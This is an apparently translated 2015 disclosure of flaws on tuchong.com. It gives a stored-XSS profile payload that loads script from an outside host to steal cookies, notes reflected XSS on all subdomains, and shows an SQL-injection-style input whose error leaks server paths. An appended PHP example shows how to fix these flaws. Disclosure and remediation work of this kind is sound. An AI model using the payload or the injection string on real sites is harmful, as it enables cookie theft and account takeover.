Source: 自学PHP网 (zixuephp.com)   Time: 2015-04-17 14:11
The impact is serious, right? Once the cookies are obtained, the account plus its MD5 password hash are in hand, and then......

Details: http://tuchong.com/settings/ After registering, configure it here. Insert the following at the tag:
a><script/src=//tmxk.org>;<!--<a
and save. Visiting the personal homepage triggers it, oh \(^o^)/~ http://tuchong.com/272288/ This...... I tested it myself; stealing cookies this way does serious damage - -

There is also a reflected XSS that hits everything: tuchong.com, so every subdomain xxxxx.tuchong.com/?view=list has an XSS vulnerability. There is a pile of other reflected XSS as well. I hope tuchong can fix this: escape what needs escaping, encode what needs encoding, filter what needs filtering... The Zend configuration is not set up properly either; there are many places that disclose server paths. Google site:tuchong.com php, or, to take a random example, www.2cto.com registration:
<input type="text" required="" id="regEmail" name="user_email">
I changed user_email to [0x7c or '1'='1'#] and got back:
{"result":"ERROR","message":"SQLSTATE[HY093]: Invalid parameter number: no parameters were bound","code":"HY093","trace":[{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/Adapter.php","line":945,"function":"execute","class":"PDOStatement","type":"->","args":[[]]},{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/TableSelect.php","line":155,"function":"query","class":"Jezo_Db_Adapter","type":"->","args":[{}]},{"file":"\/srv\/http\/tuchong\/application\/api\/controllers\/AccountController.php","line":297,"function":"fetchRow","class":"Jezo_Db_TableSelect","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Action.php","line":513,"function":"registerAction","class":"AccountController","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Dispatcher\/Standard.php","line":295,"function":"dispatch","class":"Zend_Controller_Action","type":"->","args":["registerAction"]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Front.php","line":954,"function":"dispatch","class":"Zend_Controller_Dispatcher_Standard","type":"->","args":[{},{"headersSentThrowsException":true}]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application\/Bootstrap\/Bootstrap.php","line":97,"function":"dispatch","class":"Zend_Controller_Front","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application.php","line":366,"function":"run","class":"Zend_Application_Bootstrap_Bootstrap","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/public\/api.php","line":38,"function":"run","class":"Zend_Application","type":"->","args":[]}]}
The rest - -|| I won't go into.....

Fix: escape what needs escaping, encode what needs encoding, filter what needs filtering... configure Zend properly.

Author: _Evil
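The two fixes the report asks for, as an added PHP example (not tuchong's code and not from the original report): output-encode the profile field in the HTML context it lands in, and keep PDO exception details out of the API response. It assumes the stored value is rendered inside an attribute, since the report does not show the exact injection context.

```php
<?php
// Added example, not code from the original report or from tuchong.com.

// Constructed sample input: the profile value from the report, as saved by the attacker.
$profileValue = "a><script/src=//tmxk.org>;<!--<a";

// Vulnerable rendering (the pattern the report describes, shown for comparison only):
// the stored value is concatenated into markup unencoded, so its quote and angle
// brackets break out of the attribute and a <script> element is injected.
function renderVulnerable(string $v): string {
    return '<a href="' . $v . '">profile</a>';
}

// Hardened rendering: encode for the attribute context. ENT_QUOTES handles both
// quote styles, ENT_SUBSTITUTE keeps bad UTF-8 from silently emptying the output.
function renderSafe(string $v): string {
    $enc = htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<a href="' . $enc . '">profile</a>';
}

// Error handling for a JSON API endpoint such as the registration action: the report's
// response leaked /srv/http/tuchong/... paths because the exception and its trace were
// serialized to the client. Log the detail server-side, return a generic message.
// (In Zend Framework 1 the equivalent switch for HTML pages is
//  resources.frontController.params.displayExceptions = 0 in application.ini.)
function apiErrorResponse(Throwable $e): string {
    error_log(sprintf("[%s] %s in %s:%d\n%s", get_class($e), $e->getMessage(),
        $e->getFile(), $e->getLine(), $e->getTraceAsString()));
    return json_encode(['result' => 'ERROR', 'message' => 'Registration failed']);
}

// Query the registration lookup with a bound parameter instead of string building,
// so the user_email value never reaches the SQL parser as SQL.
function findAccountByEmail(PDO $db, string $email): ?array {
    $stmt = $db->prepare('SELECT id, user_email FROM account WHERE user_email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

echo renderVulnerable($profileValue), PHP_EOL;
echo renderSafe($profileValue), PHP_EOL;
echo apiErrorResponse(new PDOException('SQLSTATE[HY093]: Invalid parameter number')), PHP_EOL;
```

Running the script shows the encoded version keeping the whole payload inside the attribute value as text, and the error response carrying no file paths.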